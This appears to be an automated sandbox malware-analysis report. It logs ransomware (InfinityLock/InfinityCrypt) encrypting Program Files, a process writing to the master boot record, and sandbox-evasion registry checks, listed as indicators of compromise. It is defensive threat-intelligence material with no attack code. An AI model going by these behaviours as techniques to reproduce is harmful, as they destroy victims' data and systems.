Resubmissions
03-08-2024 19:41
240803-yd9fjsxgpb 1003-08-2024 19:38
240803-ycw4tsxgkh 703-08-2024 19:34
240803-yadvgatajk 1013-05-2024 19:48
240513-yh3tkacb38 10Analysis
-
max time kernel
213s -
max time network
214s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
13-05-2024 19:48
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
http://malwarewatch.org
Resource
win10v2004-20240426-en
Errors
General
-
Target
http://malwarewatch.org
Malware Config
Signatures
-
InfinityLock Ransomware
Also known as InfinityCrypt. Based on the open-source HiddenTear ransomware.
-
Executes dropped EXE 1 IoCs
pid Process 5736 sys3.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 113 camo.githubusercontent.com 120 camo.githubusercontent.com 143 raw.githubusercontent.com 144 raw.githubusercontent.com -
Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 Endermanch@PowerPoint.exe File opened for modification \??\PHYSICALDRIVE0 sys3.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pl_get.svg.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\sv-se\ui-strings.js.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.185.29\msedgeupdateres_pt-PT.dll.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Home.aapp.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\PPKLite.api.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\editpdf.svg.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\bg_patterns_header.png.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\bg_pattern_RHP.png.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInSideAdapters\Microsoft.VisualStudio.Tools.Office.Word.AddInAdapter.v9.0.dll.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Microsoft.VCLibs.x86.14.00.appx.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\sv-se\ui-strings.js.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_ja_135x40.svg.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Windows NT\TableTextService\TableTextService.dll.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.151\goopdateres_id.dll.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.185.29\msedgeupdateres_ru.dll.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ViewerPS.dll.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\new_icons.png.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\eu-es\ui-strings.js.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\sk-sk\ui-strings.js.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\Close2x.png.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\de-de\ui-strings.js.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\faf-main.js.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\file_icons.png.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\ccloud.png.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-il\ui-strings.js.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\nl-nl\ui-strings.js.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\adodb.dll.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.151\goopdateres_ca.dll.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\de-de\ui-strings.js.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\sl-si\ui-strings.js.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ru-ru\ui-strings.js.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AXE8SharedExpat.dll.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\cef.pak.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\IA32.api.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner_dark2x.gif.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\es-es\ui-strings.js.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-down-pressed.gif.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\uk-ua\ui-strings.js.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\es-es\ui-strings.js.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\be_get.svg.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\th_get.svg.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ko-kr\ui-strings.js.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fr-fr\ui-strings.js.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\css\faf-main.css.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagement\de-DE\MSFT_PackageManagement.strings.psd1.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagementSource\ja-JP\MSFT_PackageManagementSource.schema.mfl.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\pe.dll.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\forms_received.gif.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\plugin.js.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\core_icons.png.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\fr-fr\ui-strings.js.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\natives_blob.bin.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\server_issue.gif.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\A12_Spinner_2x.gif.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\A12_Spinner_int_2x.gif.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-il\ui-strings.js.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.185.29\msedgeupdateres_ur.dll.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\apple-touch-icon-144x144-precomposed.png.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_folder-default_32.svg.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\zh-cn_get.svg.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview.png.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.151\goopdateres_fil.dll.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.151\goopdateres_ml.dll.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619 Endermanch@InfinityCrypt.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Endermanch@InfinityCrypt.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Endermanch@InfinityCrypt.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 taskmgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString taskmgr.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies data under HKEY_USERS 15 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "118" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2948 msedge.exe 2948 msedge.exe 3248 msedge.exe 3248 msedge.exe 4392 identity_helper.exe 4392 identity_helper.exe 6060 msedge.exe 6060 msedge.exe 4736 msedge.exe 4736 msedge.exe 4736 msedge.exe 4736 msedge.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 5260 msedge.exe 5260 msedge.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs
pid Process 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 4912 taskmgr.exe Token: SeSystemProfilePrivilege 4912 taskmgr.exe Token: SeCreateGlobalPrivilege 4912 taskmgr.exe Token: SeDebugPrivilege 4400 Endermanch@InfinityCrypt.exe Token: 33 4912 taskmgr.exe Token: SeIncBasePriorityPrivilege 4912 taskmgr.exe Token: SeShutdownPrivilege 5736 sys3.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 3248 msedge.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe 4912 taskmgr.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 876 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3248 wrote to memory of 3224 3248 msedge.exe 84 PID 3248 wrote to memory of 3224 3248 msedge.exe 84 PID 3248 wrote to memory of 1268 3248 msedge.exe 85 PID 3248 wrote to memory of 1268 3248 msedge.exe 85 PID 3248 wrote to memory of 1268 3248 msedge.exe 85 PID 3248 wrote to memory of 1268 3248 msedge.exe 85 PID 3248 wrote to memory of 1268 3248 msedge.exe 85 PID 3248 wrote to memory of 1268 3248 msedge.exe 85 PID 3248 wrote to memory of 1268 3248 msedge.exe 85 PID 3248 wrote to memory of 1268 3248 msedge.exe 85 PID 3248 wrote to memory of 1268 3248 msedge.exe 85 PID 3248 wrote to memory of 1268 3248 msedge.exe 85 PID 3248 wrote to memory of 1268 3248 msedge.exe 85 PID 3248 wrote to memory of 1268 3248 msedge.exe 85 PID 3248 wrote to memory of 1268 3248 msedge.exe 85 PID 3248 wrote to memory of 1268 3248 msedge.exe 85 PID 3248 wrote to memory of 1268 3248 msedge.exe 85 PID 3248 wrote to memory of 1268 3248 msedge.exe 85 PID 3248 wrote to memory of 1268 3248 msedge.exe 85 PID 3248 wrote to memory of 1268 3248 msedge.exe 85 PID 3248 wrote to memory of 1268 3248 msedge.exe 85 PID 3248 wrote to memory of 1268 3248 msedge.exe 85 PID 3248 wrote to memory of 1268 3248 msedge.exe 85 PID 3248 wrote to memory of 1268 3248 msedge.exe 85 PID 3248 wrote to memory of 1268 3248 msedge.exe 85 PID 3248 wrote to memory of 1268 3248 msedge.exe 85 PID 3248 wrote to memory of 1268 3248 msedge.exe 85 PID 3248 wrote to memory of 1268 3248 msedge.exe 85 PID 3248 wrote to memory of 1268 3248 msedge.exe 85 PID 3248 wrote to memory of 1268 3248 msedge.exe 85 PID 3248 wrote to memory of 1268 3248 msedge.exe 85 PID 3248 wrote to memory of 1268 3248 msedge.exe 85 PID 3248 wrote to memory of 1268 3248 msedge.exe 85 PID 3248 wrote to memory of 1268 3248 msedge.exe 85 PID 3248 wrote to memory of 1268 3248 msedge.exe 85 PID 3248 wrote to memory of 1268 3248 msedge.exe 85 PID 3248 wrote to memory of 1268 3248 msedge.exe 85 PID 3248 wrote to memory of 1268 3248 msedge.exe 85 PID 3248 wrote to memory of 1268 3248 msedge.exe 85 PID 3248 wrote to memory of 1268 3248 msedge.exe 85 PID 3248 wrote to memory of 1268 3248 msedge.exe 85 PID 3248 wrote to memory of 1268 3248 msedge.exe 85 PID 3248 wrote to memory of 2948 3248 msedge.exe 86 PID 3248 wrote to memory of 2948 3248 msedge.exe 86 PID 3248 wrote to memory of 2080 3248 msedge.exe 87 PID 3248 wrote to memory of 2080 3248 msedge.exe 87 PID 3248 wrote to memory of 2080 3248 msedge.exe 87 PID 3248 wrote to memory of 2080 3248 msedge.exe 87 PID 3248 wrote to memory of 2080 3248 msedge.exe 87 PID 3248 wrote to memory of 2080 3248 msedge.exe 87 PID 3248 wrote to memory of 2080 3248 msedge.exe 87 PID 3248 wrote to memory of 2080 3248 msedge.exe 87 PID 3248 wrote to memory of 2080 3248 msedge.exe 87 PID 3248 wrote to memory of 2080 3248 msedge.exe 87 PID 3248 wrote to memory of 2080 3248 msedge.exe 87 PID 3248 wrote to memory of 2080 3248 msedge.exe 87 PID 3248 wrote to memory of 2080 3248 msedge.exe 87 PID 3248 wrote to memory of 2080 3248 msedge.exe 87 